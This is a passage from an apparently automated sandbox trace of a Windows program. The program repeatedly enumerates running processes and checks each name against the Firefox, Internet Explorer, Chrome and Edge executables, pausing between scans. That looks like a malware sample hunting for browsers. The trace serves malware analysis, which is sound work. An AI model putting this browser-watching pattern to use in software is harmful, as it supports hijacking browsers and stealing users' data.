[0219.635] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0219.635] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0219.636] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0219.636] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0219.636] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0219.636] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0219.636] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0219.637] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0219.637] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0219.637] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0219.637] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0219.637] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0219.637] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0219.637] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0219.638] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0219.638] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0219.638] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0219.638] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0219.638] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0219.638] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0219.638] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0219.638] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.639] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0219.639] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0219.639] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0219.639] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.639] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.639] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.639] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.639] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.639] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0219.640] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0219.640] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0219.640] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0219.640] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.640] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.640] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0219.641] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0219.641] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0219.641] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.641] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.641] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0219.641] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0219.641] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0219.641] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.641] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.642] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0219.642] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0219.642] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0219.642] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.642] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0219.642] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0219.642] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0219.642] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0219.642] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.642] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0219.643] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0219.643] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0219.643] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0219.643] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0219.643] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.643] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0219.643] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0219.643] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0219.643] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.643] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.644] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0219.644] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0219.644] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0219.644] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.644] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.645] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0219.645] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0219.645] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0219.646] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0219.646] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0219.646] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0219.646] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0219.646] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0219.646] CloseHandle (hObject=0xd4) returned 1 [0219.646] Sleep (dwMilliseconds=0x3e8) [0220.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0220.666] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.666] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0220.666] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0220.666] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0220.666] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0220.666] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.667] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0220.667] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0220.667] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0220.667] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0220.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.667] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0220.667] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0220.667] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0220.667] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.667] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.668] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0220.668] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0220.668] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0220.668] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.668] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.668] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0220.669] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0220.669] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0220.669] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.669] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0220.669] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0220.669] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0220.669] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.669] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.670] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0220.670] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0220.670] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0220.670] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.670] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.670] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0220.670] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0220.670] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0220.670] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.670] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.671] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0220.671] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0220.671] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0220.671] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.671] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.671] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0220.672] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0220.672] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0220.672] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.672] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.672] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.672] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.672] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.672] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.673] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.673] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.673] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.674] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.674] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0220.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0220.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0220.675] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.675] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.675] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.675] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.676] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.676] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.677] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0220.677] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0220.677] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0220.677] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0220.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0220.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0220.677] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.677] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0220.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0220.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0220.678] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.678] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.678] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.678] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.678] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.678] lstrcmpiA (lpString1="svchost.exe", 